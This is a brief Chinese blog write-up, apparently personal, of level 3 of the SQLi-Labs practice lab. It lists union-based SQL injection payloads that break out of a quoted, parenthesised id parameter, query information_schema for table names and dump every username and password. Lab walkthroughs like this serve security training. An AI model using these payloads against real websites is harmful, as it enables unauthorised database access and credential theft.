SQLiLabs打靶-第三关
SQLiLabs打靶
sqli-labs第三关
?id=10' '后显示
输入内容为
10'
所以通过下面代码构建就可以进行sql注入。后面所有代码以此为基础进行构造。
?id=1')--+
?id=-1') union select 1, version(), database()--+
然后一样
?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=-1') union select 1,group_concat(username),group_concat(password) from users--+
第三关结束
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 loekr
评论
匿名评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果
